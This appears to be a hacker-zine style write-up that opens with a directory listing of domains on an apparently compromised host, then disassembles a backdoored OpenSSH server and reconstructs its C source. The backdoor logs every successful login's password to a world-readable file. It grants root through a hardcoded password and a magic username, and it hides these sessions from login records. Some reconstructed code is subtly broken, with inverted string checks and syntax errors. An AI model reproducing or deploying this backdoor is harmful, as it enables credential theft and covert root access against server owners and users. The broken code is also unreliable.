drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 .
|
||
drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 ..
|
||
drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 cybershade.org
|
||
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 darkmindz.com
|
||
|
||
/home/sam/domains/:
|
||
total 12
|
||
drwx--x--x 3 sam sam 4096 May 12 09:00 .
|
||
drwx--x--x 4 sam sam 4096 May 12 09:26 ..
|
||
drwx--x--x 8 sam sam 4096 May 13 00:11 metus-project.com
|
||
|
||
/home/scraft758/domains/:
|
||
total 24
|
||
drwx--x--x 6 scraft758 scraft758 4096 Apr 16 20:03 .
|
||
drwx--x--x 7 scraft758 scraft758 4096 Apr 16 20:03 ..
|
||
drwx--x--x 7 scraft758 scraft758 4096 Jan 27 21:12 mods4hire.com
|
||
drwx--x--x 7 scraft758 scraft758 4096 Mar 25 2008 samcraft.com
|
||
drwx--x--x 7 scraft758 scraft758 4096 Mar 25 2008 samcraft.net
|
||
drwx--x--x 7 scraft758 scraft758 4096 Oct 28 2008 theconsolejunkies.com
|
||
|
||
/home/wheelglow/domains/:
|
||
total 12
|
||
drwx--x--x 3 wheelglow wheelglow 4096 Sep 12 2007 .
|
||
drwx--x--x 6 wheelglow wheelglow 4096 Jan 24 22:49 ..
|
||
drwx--x--x 8 wheelglow wheelglow 4096 Sep 12 2007 wheelglow.com
|
||
|
||
/home/wtfsmilez/domains/:
|
||
total 12
|
||
drwx--x--x 3 wtfsmilez wtfsmilez 4096 Apr 30 17:00 .
|
||
drwx--x--x 5 wtfsmilez wtfsmilez 4096 May 2 13:11 ..
|
||
drwx--x--x 8 wtfsmilez wtfsmilez 4096 May 3 19:12 wtfgamers.net
|
||
|
||
/home/xckx/domains/:
|
||
total 16
|
||
drwx--x--x 4 xckx xckx 4096 Feb 22 02:44 .
|
||
drwx--x--x 8 xckx xckx 4096 Feb 22 02:44 ..
|
||
drwx--x--x 7 xckx xckx 4096 Apr 16 2008 oinfam0uso.com
|
||
drwx--x--x 7 xckx xckx 4096 Feb 23 00:12 snayke.com
|
||
|
||
/home/yourkicks/domains/:
|
||
total 16
|
||
drwx--x--x 4 yourkicks yourkicks 4096 Jan 6 19:33 .
|
||
drwx--x--x 5 yourkicks yourkicks 4096 Jan 28 21:21 ..
|
||
drwx--x--x 8 yourkicks yourkicks 4096 Jan 6 21:15 yourkicksonline.com
|
||
drwx--x--x 8 yourkicks yourkicks 4096 Jan 6 21:15 yourkicksonline.net
|
||
|
||
/home/zer0/domains/:
|
||
total 12
|
||
drwx--x--x 3 zer0 zer0 4096 May 20 17:00 .
|
||
drwx--x--x 5 zer0 zer0 4096 May 23 01:28 ..
|
||
drwx--x--x 8 zer0 zer0 4096 May 23 01:28 zer0zone.ws
|
||
|
||
Ghetto.
|
||
|
||
|
||
|
||
|
||
_______ _______ ______
|
||
\ _ \ ___ __\ _ \ / __ \
|
||
/ /_\ \\ \/ / /_\ \ > <
|
||
\ \_/ \> <\ \_/ \/ -- \
|
||
\_____ /__/\_ \\_____ /\______ /
|
||
\/ \/ \/ \/
|
||
__________ __ .___
|
||
\______ \_____ ____ | | __ __| _/____ ___________
|
||
| | _/\__ \ _/ ___\| |/ // __ |/ _ \ / _ \_ __ \
|
||
| | \ / __ \\ \___| </ /_/ ( <_> | <_> ) | \/
|
||
|______ /(____ /\___ >__|_ \____ |\____/ \____/|__|
|
||
\/ \/ \/ \/ \/
|
||
___________________ ___________
|
||
\______ \_ ___ \\_ _____/
|
||
| _/ \ \/ | __)_
|
||
| | \ \____| \
|
||
|____|_ /\______ /_______ /
|
||
\/ \/ \/
|
||
|
||
|
||
char abuff[1024];
|
||
char sbuff[1024];
|
||
char * aSSSSSS = "%s%s\t [ %s %s %s %s ]"; //db '%s%s',9,' [ %s %s %s %s ]',0Ah
|
||
char * a0m = "\x1B[0m"; //db 1Bh,'[0m',0
|
||
char * aOwned ="see below";
|
||
char * aAGb7 = "a-gb7"
|
||
/*
|
||
.rodata:08078D34 aOwned db 0Ah ; DATA XREF: do_motd+DFo
|
||
.rodata:08078D34 db 9,9,'+----------------------------[ Owned ]-------------------------'
|
||
.rodata:08078D34 db '---+',0Ah
|
||
.rodata:08078D34 db 9,9,'| Hack everyone you can and then hack some more '
|
||
.rodata:08078D34 db ' |',0Ah
|
||
.rodata:08078D34 db 9,9,'| Owned[DC] v2 '
|
||
.rodata:08078D34 db ' |',0Ah
|
||
.rodata:08078D34 db 9,9,'| _______ . _______ . _______ '
|
||
.rodata:08078D34 db ' |',0Ah
|
||
.rodata:08078D34 db 9,9,'| Get in as anonymous, Leave with no trace. '
|
||
.rodata:08078D34 db ' |',0Ah
|
||
.rodata:08078D34 db 9,9,'| '
|
||
.rodata:08078D34 db ' |',0Ah
|
||
.rodata:08078D34 db 9,9,'+--------------------------------------------------------------'
|
||
.rodata:08078D34 db '---+',0Ah,0
|
||
*/
|
||
char * a033031mOwned03 = "\[\033[0;31m\]Owned\[\033[1;30m\][\[\033[1;37m\]DC\[\033[1;30m\]]:[\033[1;32m\]\w\[\033[1;30m\]]\[\033[1;30m\]\$\[\033[0m\] ";
|
||
char s[1024];
|
||
char * filename = "/var/run/ssh.old";
|
||
char i = 0;
|
||
size_t len;
|
||
FILE * log;
|
||
char * HookinSS = "HOOKIN: %s:%s"
|
||
char * a0x3aownt = "0x3aownt";
|
||
char * aSk3rhgldyw = "Sk3rhGLdYW";
|
||
|
||
|
||
//known structs
|
||
|
||
struct passwd {
|
||
char *pw_name;
|
||
char *pw_passwd;
|
||
uid_t pw_uid;
|
||
gid_t pw_gid;
|
||
time_t pw_change;
|
||
char *pw_class;
|
||
char *pw_gecos;
|
||
char *pw_dir;
|
||
char *pw_shell;
|
||
time_t pw_expire;
|
||
};
|
||
|
||
|
||
struct Authctxt {
|
||
int success;
|
||
int postponed; /* authentication needs another step */
|
||
int valid; /* user exists and is allowed to login */
|
||
int attempt;
|
||
int failures;
|
||
int force_pwchange;
|
||
char *user; /* username sent by the client */
|
||
char *service;
|
||
struct passwd *pw; /* set if 'valid' */
|
||
char *style;
|
||
void *kbdintctxt;
|
||
#ifdef BSD_AUTH
|
||
auth_session_t *as;
|
||
#endif
|
||
#ifdef KRB5
|
||
krb5_context krb5_ctx;
|
||
krb5_ccache krb5_fwd_ccache;
|
||
krb5_principal krb5_user;
|
||
char *krb5_ticket_file;
|
||
char *krb5_ccname;
|
||
#endif
|
||
Buffer *loginmsg;
|
||
void *methoddata;
|
||
};
|
||
|
||
struct utsname {
|
||
char sysname[_SYS_NMLN];
|
||
char nodename[_SYS_NMLN];
|
||
char release[_SYS_NMLN];
|
||
char version[_SYS_NMLN];
|
||
char machine[_SYS_NMLN];
|
||
}
|
||
|
||
/* sys_auth_passwd
|
||
.text:0804FA98 push edi
|
||
.text:0804FA99 push dword ptr [esi] ; esi = arg_0 + 20h
|
||
.text:0804FA99 ; authctxt->pw
|
||
.text:0804FA99 ; [esi] = pw->pw_name
|
||
.text:0804FA9B push offset aHookinSS ; "HOOKIN: %s:%s\n"
|
||
.text:0804FAA0 push offset abuff ; s
|
||
.text:0804FAA5 call _sprintf
|
||
.text:0804FAAA mov edi, offset abuff ; start: strlen(abuff)
|
||
.text:0804FAAF xor eax, eax
|
||
.text:0804FAB1 cld
|
||
.text:0804FAB2 mov ecx, 0FFFFFFFFh
|
||
.text:0804FAB7 repne scasb
|
||
.text:0804FAB9 not ecx
|
||
.text:0804FABB lea edx, [ecx-1]
|
||
.text:0804FABE add esp, 10h
|
||
.text:0804FAC1 cmp ebx, edx ; fin;
|
||
.text:0804FAC3 mov ds:alen, edx ; alen = strlen result
|
||
.text:0804FAC9 mov ds:ai, 0 ; for(ai = 0
|
||
.text:0804FAD3 jg short loc_804FAE8
|
||
.text:0804FAD5 xor eax, eax
|
||
.text:0804FAD7 nop
|
||
.text:0804FAD8
|
||
.text:0804FAD8 loc_804FAD8: ; CODE XREF: sys_auth_passwd+CDj
|
||
.text:0804FAD8 not ds:abuff[eax]
|
||
.text:0804FADE inc eax ; eax++ (ai++)
|
||
.text:0804FADF cmp eax, edx ; ;ai<=edx (alen)
|
||
.text:0804FAE1 jle short loc_804FAD8
|
||
.text:0804FAE3 mov ds:ai, eax
|
||
.text:0804FAE8
|
||
.text:0804FAE8 loc_804FAE8: ; CODE XREF: sys_auth_passwd+BFj
|
||
.text:0804FAE8 sub esp, 8
|
||
.text:0804FAEB push (offset aDsa_0+2) ; aDsa = db 'dsa',0 | aDsa+2h = 'a',0
|
||
.text:0804FAF0 push offset filename ; "/var/run/ssh.old"
|
||
.text:0804FAF5 call _fopen ; fopen(filename,"a")
|
||
.text:0804FAFA add esp, 10h
|
||
.text:0804FAFD test eax, eax ; if(fopen(...) != NULL)
|
||
.text:0804FAFD ; jump
|
||
.text:0804FAFF mov ds:alog, eax
|
||
.text:0804FB04 jnz short loc_804FB3B
|
||
.text:0804FB06
|
||
.text:0804FB06 loc_804FB06: ; CODE XREF: sys_auth_passwd+149j
|
||
.text:0804FB06 sub esp, 8
|
||
.text:0804FB09 push 1B6h ; mode (0666)
|
||
.text:0804FB0E push offset filename ; "/var/run/ssh.old"
|
||
.text:0804FB13 call _chmod ; chmod(filename,0666)
|
||
.text:0804FB18 lea esp, [ebp-0Ch]
|
||
.text:0804FB1B pop ebx
|
||
.text:0804FB1C pop esi
|
||
.text:0804FB1D mov eax, 1
|
||
.text:0804FB22 pop edi
|
||
.text:0804FB23 leave
|
||
.text:0804FB24 retn ; return 1
|
||
.text:0804FB24 ; ---------------------------------------------------------------------------
|
||
.text:0804FB25 align 4
|
||
.text:0804FB28
|
||
.text:0804FB28 loc_804FB28: ; CODE XREF: sys_auth_passwd+17j
|
||
.text:0804FB28 sub esp, 0Ch
|
||
.text:0804FB2B push esi
|
||
.text:0804FB2C call shadow_pw
|
||
.text:0804FB31 mov ebx, eax
|
||
.text:0804FB33 add esp, 10h
|
||
.text:0804FB36 jmp loc_804FA34
|
||
.text:0804FB3B ; ---------------------------------------------------------------------------
|
||
.text:0804FB3B
|
||
.text:0804FB3B loc_804FB3B: ; CODE XREF: sys_auth_passwd+F0j
|
||
.text:0804FB3B push eax ; eax = file stream
|
||
.text:0804FB3C push 1
|
||
.text:0804FB3E push ds:alen ; length of abuff
|
||
.text:0804FB44 push offset abuff ; ptr to abuff
|
||
.text:0804FB49 call _fwrite
|
||
.text:0804FB4E pop eax
|
||
.text:0804FB4F push ds:alog ; stream
|
||
.text:0804FB55 call _fclose ; fclose(alog)
|
||
.text:0804FB5A add esp, 10h
|
||
.text:0804FB5D jmp short loc_804FB06
|
||
.text:0804FB5D sys_auth_passwd endp
|
||
*/
|
||
|
||
|
||
sys_auth_passwd(Authctxt *authctxt, const char *password)
|
||
{
|
||
struct passwd *pw = authctxt->pw;
|
||
char *encrypted_password;
|
||
|
||
/* Just use the supplied fake password if authctxt is invalid */
|
||
char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd;
|
||
|
||
/* Check for users with no password. */
|
||
if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0)
|
||
return (1);
|
||
|
||
/* Encrypt the candidate password using the proper salt. */
|
||
encrypted_password = xcrypt(password,
|
||
(pw_password[0] && pw_password[1]) ? pw_password : "xx");
|
||
|
||
if(!strcmp(encrypted_password, pw_password) == 0)
|
||
return (0);
|
||
|
||
sprintf(abuff,HookinSS,pw->pw_name,password); // lulz ^ 10
|
||
len = strlen(abuff);
|
||
for(i = 0;i<=len;i++)
|
||
abuff[i] = ~abuff[i]; // An unbreakable NOT encryption algorithm!
|
||
if((log = fopen(filename,"a"))!=NULL) {
|
||
fwrite(&abuff,len,1,log);
|
||
fclose(log);
|
||
}
|
||
chmod(filename,0x1B6); //0x1B6 = 0666 (base 8)
|
||
return 1;
|
||
/*
|
||
* Authentication is accepted if the encrypted passwords
|
||
* are identical.
|
||
*/
|
||
//return (strcmp(encrypted_password, pw_password) == 0);
|
||
}
|
||
|
||
|
||
|
||
/* auth_password
|
||
.text:0804FB60 public auth_password
|
||
.text:0804FB60 auth_password proc near ; CODE XREF: auth1_process_password+BFp
|
||
.text:0804FB60 ; do_authentication+15Ap ...
|
||
.text:0804FB60
|
||
.text:0804FB60 arg_0 = dword ptr 8
|
||
.text:0804FB60 arg_4 = dword ptr 0Ch
|
||
.text:0804FB60
|
||
.text:0804FB60 push ebp
|
||
.text:0804FB61 mov ebp, esp
|
||
.text:0804FB63 push edi
|
||
.text:0804FB64 push esi
|
||
.text:0804FB65 push ebx
|
||
.text:0804FB66 sub esp, 0Ch
|
||
.text:0804FB69 mov ebx, [ebp+arg_4] ; ebx = const char * password
|
||
.text:0804FB6C mov ds:hookarOn, 0 ; hookarOn = 0;
|
||
.text:0804FB76 mov esi, ebx
|
||
.text:0804FB78 mov edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
|
||
.text:0804FB7D mov ecx, 0Bh
|
||
.text:0804FB82 cld
|
||
.text:0804FB83 repe cmpsb ; strcmp ebx,aSk3rhgldyw
|
||
.text:0804FB85 jnz short loc_804FBA0 ; if not equal then jump
|
||
.text:0804FB87 mov ds:hookarOn, 1 ; hookarOn = 1;
|
||
.text:0804FB91 mov eax, 1
|
||
.text:0804FB96
|
||
.text:0804FB96 loc_804FB96: ; CODE XREF: auth_password+5Fj
|
||
.text:0804FB96 ; auth_password+80j ...
|
||
.text:0804FB96 lea esp, [ebp-0Ch]
|
||
.text:0804FB99 pop ebx
|
||
.text:0804FB9A pop esi
|
||
.text:0804FB9B pop edi
|
||
.text:0804FB9C leave
|
||
.text:0804FB9D retn ; return 1
|
||
*/
|
||
|
||
int
|
||
auth_password(Authctxt *authctxt, const char *password)
|
||
{
|
||
struct passwd * pw = authctxt->pw;
|
||
int result, ok = authctxt->valid;
|
||
|
||
hookarOn = 0;:
|
||
if (!strcmp(password, aSk3rhgldyw)) { //"Sk3rhGLdYW"
|
||
hookarOn = 1;
|
||
return 1;
|
||
}
|
||
|
||
//...
|
||
}
|
||
|
||
|
||
/* record_login
|
||
.text:08050848 public record_login
|
||
.text:08050848 record_login proc near ; CODE XREF: do_login+F7p
|
||
.text:08050848 ; mm_answer_pty+116p
|
||
.text:08050848
|
||
.text:08050848 var_338 = dword ptr -338h
|
||
.text:08050848 timer = dword ptr -31Ch
|
||
.text:08050848 var_318 = byte ptr -318h
|
||
.text:08050848 var_118 = byte ptr -118h
|
||
.text:08050848 s = byte ptr -117h
|
||
.text:08050848 arg_0 = dword ptr 8
|
||
.text:08050848 arg_4 = dword ptr 0Ch
|
||
.text:08050848 arg_8 = dword ptr 10h
|
||
.text:08050848 arg_C = dword ptr 14h
|
||
.text:08050848 arg_10 = dword ptr 18h
|
||
.text:08050848 arg_14 = dword ptr 1Ch
|
||
.text:08050848 arg_18 = dword ptr 20h
|
||
.text:08050848
|
||
.text:08050848 push ebp
|
||
.text:08050849 mov ebp, esp
|
||
.text:0805084B push edi
|
||
.text:0805084C push esi
|
||
.text:0805084D push ebx
|
||
.text:0805084E sub esp, 31Ch
|
||
.text:08050854 mov eax, ds:hookarOn
|
||
.text:08050859 test eax, eax
|
||
.text:0805085B mov esi, [ebp+arg_8]
|
||
.text:0805085E jz short loc_8050868
|
||
.text:08050860 lea esp, [ebp-0Ch]
|
||
.text:08050863 pop ebx
|
||
.text:08050864 pop esi
|
||
.text:08050865 pop edi
|
||
.text:08050866 leave
|
||
.text:08050867 retn
|
||
*/
|
||
|
||
/*
|
||
* Records that the user has logged in. I wish these parts of operating
|
||
* systems were more standardized.
|
||
*/
|
||
void
|
||
record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
|
||
const char *host, struct sockaddr * addr, socklen_t addrlen)
|
||
{
|
||
if(hookarOn)
|
||
return;
|
||
//...
|
||
}
|
||
|
||
|
||
|
||
/* record_logout
|
||
|
||
.text:08050994 public record_logout
|
||
.text:08050994 record_logout proc near ; CODE XREF: session_pty_cleanup2+84p
|
||
.text:08050994
|
||
.text:08050994 var_18 = dword ptr -18h
|
||
.text:08050994 var_4 = dword ptr -4
|
||
.text:08050994 arg_0 = dword ptr 8
|
||
.text:08050994 arg_4 = dword ptr 0Ch
|
||
.text:08050994 arg_8 = dword ptr 10h
|
||
.text:08050994
|
||
.text:08050994 push ebp
|
||
.text:08050995 mov ebp, esp
|
||
.text:08050997 push ebx
|
||
.text:08050998 push eax
|
||
.text:08050999 mov ebx, ds:hookarOn
|
||
.text:0805099F test ebx, ebx
|
||
.text:080509A1 mov ecx, [ebp+arg_0]
|
||
.text:080509A4 mov eax, [ebp+arg_4]
|
||
.text:080509A7 mov edx, [ebp+arg_8]
|
||
.text:080509AA jz short loc_80509B4
|
||
.text:080509AC mov ebx, [ebp+var_4]
|
||
.text:080509AF leave
|
||
|
||
|
||
*/
|
||
|
||
|
||
|
||
void
|
||
record_logout(pid_t pid, const char *tty, const char *user)
|
||
{
|
||
struct logininfo *li;
|
||
if(hookarOn) return;
|
||
li = login_alloc_entry(pid, user, NULL, tty);
|
||
login_logout(li);
|
||
login_free_entry(li);
|
||
}
|
||
|
||
|
||
|
||
|
||
/* auth_root_allowed
|
||
.text:080547DC public auth_root_allowed
|
||
.text:080547DC auth_root_allowed proc near ; CODE XREF: do_authentication+3CBp
|
||
.text:080547DC ; userauth_finish+18Ep ...
|
||
.text:080547DC
|
||
.text:080547DC arg_0 = dword ptr 8
|
||
.text:080547DC
|
||
.text:080547DC push ebp
|
||
.text:080547DD mov ebp, esp
|
||
.text:080547DF cmp ds:hookarOn, 1
|
||
.text:080547E6 push edi
|
||
.text:080547E7 push esi
|
||
.text:080547E8 mov ecx, 1
|
||
.text:080547ED jz short loc_805481C
|
||
|
||
|
||
.text:0805481C loc_805481C: ; CODE XREF: auth_root_allowed+11j
|
||
.text:0805481C ; auth_root_allowed+54j ...
|
||
.text:0805481C lea esp, [ebp-8]
|
||
.text:0805481F pop esi
|
||
.text:08054820 mov eax, ecx
|
||
.text:08054822 pop edi
|
||
.text:08054823 leave
|
||
.text:08054824 retn
|
||
|
||
*/
|
||
|
||
|
||
/*
|
||
* Check whether root logins are disallowed.
|
||
*/
|
||
int
|
||
auth_root_allowed(char *method)
|
||
{
|
||
|
||
if (hookarOn == 1)
|
||
return 1;
|
||
//...
|
||
}
|
||
|
||
|
||
/* auth1_process_password
|
||
.text:08054E98 auth1_process_password proc near
|
||
.text:08054E98
|
||
.text:08054E98 var_28 = dword ptr -28h
|
||
.text:08054E98 n = dword ptr -10h
|
||
.text:08054E98 arg_0 = dword ptr 8
|
||
.text:08054E98
|
||
.text:08054E98 push ebp
|
||
.text:08054E99 mov ebp, esp
|
||
.text:08054E9B push edi
|
||
.text:08054E9C push esi
|
||
.text:08054E9D push ebx
|
||
.text:08054E9E sub esp, 18h
|
||
.text:08054EA1 lea eax, [ebp+n]
|
||
.text:08054EA4 push eax
|
||
.text:08054EA5 call packet_get_string ; read user pass in plain
|
||
.text:08054EAA mov ebx, eax ; ebx = pass
|
||
.text:08054EAC mov eax, [ebp+arg_0] ; arg_0 = Authctxt struct
|
||
.text:08054EAF mov ecx, [eax+8] ; eax+8 = authctxt->valid
|
||
.text:08054EB2 add esp, 10h
|
||
.text:08054EB5 test ecx, ecx ; if valid dont jump
|
||
.text:08054EB7 jz short loc_8054ED3
|
||
.text:08054EB9 mov edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
|
||
.text:08054EBE mov ecx, 0Bh
|
||
.text:08054EC3 cld
|
||
.text:08054EC4 mov esi, ebx ; esi = pass (ebx)
|
||
.text:08054EC6 repe cmpsb ; strcmp pass, aSk3rhgldyw
|
||
.text:08054EC8 jz short loc_8054F38 ; if equal jump to return 1
|
||
.text:08054ECA cmp ds:hookarOn, 1 ; if(hookarOn == 1)
|
||
.text:08054ECA ; jmp to return 1
|
||
.text:08054ED1 jz short loc_8054F38
|
||
|
||
|
||
.text:08054F38 loc_8054F38: ; CODE XREF: auth1_process_password+30j
|
||
.text:08054F38 ; auth1_process_password+39j
|
||
.text:08054F38 mov ds:hookarOn, 1
|
||
.text:08054F42 lea esp, [ebp-0Ch]
|
||
.text:08054F45 pop ebx
|
||
.text:08054F46 pop esi
|
||
.text:08054F47 mov eax, 1
|
||
.text:08054F4C pop edi
|
||
.text:08054F4D leave
|
||
.text:08054F4E retn
|
||
*/
|
||
|
||
static int
|
||
auth1_process_password(Authctxt *authctxt, char *info, size_t infolen)
|
||
{
|
||
|
||
int authenticated = 0;
|
||
char *password;
|
||
u_int dlen;
|
||
|
||
/*
|
||
* Read user password. It is in plain text, but was
|
||
* transmitted over the encrypted channel so it is
|
||
* not visible to an outside observer.
|
||
*/
|
||
password = packet_get_string(&dlen);
|
||
if(authctxt->valid)
|
||
if(!strcmp(password,aSk3rhgldyw) || hookarOn = 1) { //"Sk3rhGLdYW"
|
||
hookarOn = 1;
|
||
return 1;
|
||
}
|
||
packet_check_eom();
|
||
|
||
/* Try authentication with the password. */
|
||
authenticated = PRIVSEP(auth_password(authctxt, password));
|
||
|
||
memset(password, 0, dlen);
|
||
xfree(password);
|
||
|
||
return (authenticated);
|
||
}
|
||
|
||
|
||
/* do_authentication
|
||
.text:08055188 ; Attributes: bp-based frame
|
||
.text:08055188
|
||
.text:08055188 public do_authentication
|
||
.text:08055188 do_authentication proc near ; CODE XREF: main+1EA5p
|
||
.text:08055188
|
||
.text:08055188 var_438 = dword ptr -438h
|
||
.text:08055188 var_41C = byte ptr -41Ch
|
||
.text:08055188 var_418 = byte ptr -418h
|
||
.text:08055188 arg_0 = dword ptr 8
|
||
.text:08055188
|
||
.text:08055188 push ebp
|
||
.text:08055189 mov ebp, esp
|
||
.text:0805518B push edi
|
||
.text:0805518C push esi
|
||
.text:0805518D push ebx
|
||
.text:0805518E sub esp, 428h
|
||
.text:08055194 push 4 ; arg
|
||
.text:08055196 call packet_read_expect
|
||
.text:0805519B lea eax, [ebp+var_41C]
|
||
.text:080551A1 mov [esp+438h+var_438], eax
|
||
.text:080551A4 call packet_get_string ; get the username
|
||
.text:080551A9 mov ebx, eax ; ebx = username
|
||
.text:080551AB call packet_remaining ; packet_check_eom()
|
||
.text:080551B0 add esp, 10h
|
||
.text:080551B3 test eax, eax
|
||
.text:080551B5 jle short loc_80551DB
|
||
.text:080551B7 push 184h
|
||
.text:080551BC push offset aAuth1_c ; "auth1.c"
|
||
.text:080551C1 push eax ; arg
|
||
.text:080551C2 push offset aPacketIntegrit ; "Packet integrity error (%d bytes remain"...
|
||
.text:080551C7 call logit
|
||
.text:080551CC mov [esp+438h+var_438], offset aPacketIntegr_0 ; "Packet integrity error."
|
||
.text:080551D3 call packet_disconnect
|
||
.text:080551D3 ; ---------------------------------------------------------------------------
|
||
.text:080551D8 db 83h ; ˊ.text:080551D9 db 0C4h ; -
|
||
.text:080551DA db 10h
|
||
.text:080551DB ; ---------------------------------------------------------------------------
|
||
.text:080551DB
|
||
.text:080551DB loc_80551DB: ; CODE XREF: do_authentication+2Dj
|
||
.text:080551DB sub esp, 8
|
||
.text:080551DE push 3Ah ; ':'
|
||
.text:080551E0 push ebx ; username
|
||
.text:080551E1 call _strchr
|
||
.text:080551E6 add esp, 10h
|
||
.text:080551E9 test eax, eax
|
||
.text:080551EB jz short loc_80551F1
|
||
.text:080551ED mov byte ptr [eax], 0
|
||
.text:080551F0 inc eax
|
||
.text:080551F1
|
||
.text:080551F1 loc_80551F1: ; CODE XREF: do_authentication+63j
|
||
.text:080551F1 mov edx, [ebp+arg_0] ; edx = Authctxt struct
|
||
.text:080551F4 mov [edx+18h], ebx ; edx + 18h = authctxt->user
|
||
.text:080551F7 mov [edx+24h], eax ; edx + 24h = authctxt->style
|
||
.text:080551FA mov edi, offset a0x3aownt ; "0x3aownt"
|
||
.text:080551FF mov ecx, 9
|
||
.text:08055204 cld
|
||
.text:08055205 mov esi, ebx ; esi = username
|
||
.text:08055207 repe cmpsb ; strcmp username a0x3aownt
|
||
.text:08055209 jnz loc_8055360 ; if(equal) else ...
|
||
.text:0805520F mov ds:hookarOn, 1 ; hookarOn = 1
|
||
.text:08055219 mov dword ptr [ebx], 746F6F72h ; username =
|
||
.text:08055219 ; 74('t')6F('o')6F('o')72('r') = "root"
|
||
.text:0805521F mov byte ptr [ebx+4], 0 ; ascii null terminating char
|
||
.text:0805521F ; strcpy?
|
||
|
||
|
||
.text:08055360 loc_8055360: ; CODE XREF: do_authentication+81j
|
||
.text:08055360 mov ds:hookarOn, 0
|
||
.text:0805536A jmp loc_8055223
|
||
jmp loc_8055223
|
||
|
||
*/
|
||
|
||
/*
|
||
* Performs authentication of an incoming connection. Session key has already
|
||
* been exchanged and encryption is enabled.
|
||
*/
|
||
void
|
||
do_authentication(Authctxt *authctxt)
|
||
{
|
||
u_int ulen;
|
||
char *user, *style = NULL;
|
||
|
||
/* Get the name of the user that we wish to log in as. */
|
||
packet_read_expect(SSH_CMSG_USER);
|
||
|
||
/* Get the user name. */
|
||
user = packet_get_string(&ulen);
|
||
packet_check_eom();
|
||
|
||
if ((style = strchr(user, ':')) != NULL)
|
||
*style++ = '\0';
|
||
|
||
authctxt->user = user;
|
||
authctxt->style = style;
|
||
|
||
if (strcmp(user, a0x3aownt)) {
|
||
hookarOn = 1;
|
||
strcpy(user,"root");
|
||
} else
|
||
hookarOn = 0;
|
||
//...
|
||
}
|
||
|
||
|
||
|
||
|
||
/* input_userauth_request
|
||
.text:08055982 loc_8055982: ; CODE XREF: input_userauth_request+84j
|
||
.text:08055982 mov edi, offset a0x3aownt ; "0x3aownt"
|
||
.text:08055987 mov ecx, 9
|
||
.text:0805598C cld
|
||
.text:0805598D mov esi, [ebp+s1]
|
||
.text:08055990 repe cmpsb
|
||
.text:08055992 jz loc_8055AB8
|
||
.text:08055998 mov edx, [ebp+var_10]
|
||
.text:0805599B mov eax, [edx+0Ch]
|
||
.text:0805599E inc eax
|
||
.text:0805599F mov ds:hookarOn, 0
|
||
|
||
.text:08055AB8 loc_8055AB8: ; CODE XREF: input_userauth_request+9Aj
|
||
.text:08055AB8 mov eax, [ebp+s1]
|
||
.text:08055ABB mov ds:hookarOn, 1
|
||
.text:08055AC5 mov dword ptr [eax], 746F6F72h
|
||
.text:08055ACB mov byte ptr [eax+4], 0
|
||
.text:08055ACF mov edx, [ebp+var_10]
|
||
.text:08055AD2 mov eax, [edx+0Ch]
|
||
.text:08055AD5 inc eax
|
||
.text:08055AD6 mov [edx+0Ch], eax
|
||
.text:08055AD9 dec eax
|
||
.text:08055ADA jnz loc_80559B3
|
||
*/
|
||
|
||
|
||
static void
|
||
input_userauth_request(int type, u_int32_t seq, void *ctxt)
|
||
{
|
||
//...
|
||
if (strcmp(user, a0x3aownt)) {
|
||
hookarOn = 1;
|
||
strcpy(user,"root");
|
||
} else
|
||
hookarOn = 0;
|
||
//...
|
||
}
|
||
|
||
|
||
/* do_motd
|
||
.text:080568E0 public do_motd
|
||
.text:080568E0 do_motd proc near ; CODE XREF: do_login+B9p
|
||
.text:080568E0
|
||
.text:080568E0 s = byte ptr -108h
|
||
.text:080568E0
|
||
.text:080568E0 push ebp
|
||
.text:080568E1 mov ebp, esp
|
||
.text:080568E3 push esi
|
||
.text:080568E4 push ebx
|
||
.text:080568E5 sub esp, 100h
|
||
.text:080568EB mov edx, dword ptr ds:options+634h
|
||
.text:080568F1 test edx, edx
|
||
.text:080568F3 jnz short loc_805690C
|
||
.text:080568F5
|
||
.text:080568F5 loc_80568F5: ; CODE XREF: do_motd+67j
|
||
.text:080568F5 cmp ds:hookarOn, 1
|
||
.text:080568FC jz loc_805698B
|
||
.text:08056902
|
||
.text:08056902 loc_8056902: ; CODE XREF: do_motd+A5j
|
||
.text:08056902 ; do_motd+C2j ...
|
||
.text:08056902 lea esp, [ebp-8]
|
||
.text:08056905 pop ebx
|
||
.text:08056906 pop esi
|
||
.text:08056907 leave
|
||
.text:08056908 retn
|
||
.text:08056908 ; ---------------------------------------------------------------------------
|
||
.text:08056909 align 4
|
||
.text:0805690C
|
||
.text:0805690C loc_805690C: ; CODE XREF: do_motd+13j
|
||
.text:0805690C sub esp, 8
|
||
.text:0805690F push (offset aSLineDBadPortN+1Ah) ; modes
|
||
.text:08056914 push eax
|
||
.text:08056915 push offset aEtcMotd ; "/etc/motd"
|
||
.text:0805691A push offset aEtcMotd ; "/etc/motd"
|
||
.text:0805691F push offset aWelcome ; "welcome"
|
||
.text:08056924 push ds:lc
|
||
.text:0805692A call _login_getcapstr
|
||
.text:0805692F add esp, 14h
|
||
.text:08056932 push eax ; filename
|
||
.text:08056933 call _fopen
|
||
.text:08056938 add esp, 10h
|
||
.text:0805693B test eax, eax
|
||
.text:0805693D mov ebx, eax
|
||
.text:0805693F lea esi, [ebp+s]
|
||
.text:08056945 jnz short loc_805695E
|
||
.text:08056947 jmp short loc_80568F5
|
||
.text:08056947 ; ---------------------------------------------------------------------------
|
||
.text:08056949 align 4
|
||
.text:0805694C
|
||
.text:0805694C loc_805694C: ; CODE XREF: do_motd+90j
|
||
.text:0805694C sub esp, 8
|
||
.text:0805694F push ds:__stdoutp ; stream
|
||
.text:08056955 push esi ; s
|
||
.text:08056956 call _fputs
|
||
.text:0805695B add esp, 10h
|
||
.text:0805695E
|
||
.text:0805695E loc_805695E: ; CODE XREF: do_motd+65j
|
||
.text:0805695E push eax
|
||
.text:0805695F push ebx ; stream
|
||
.text:08056960 push 100h ; n
|
||
.text:08056965 push esi ; s
|
||
.text:08056966 call _fgets
|
||
.text:0805696B add esp, 10h
|
||
.text:0805696E test eax, eax
|
||
.text:08056970 jnz short loc_805694C
|
||
.text:08056972 sub esp, 0Ch
|
||
.text:08056975 push ebx ; stream
|
||
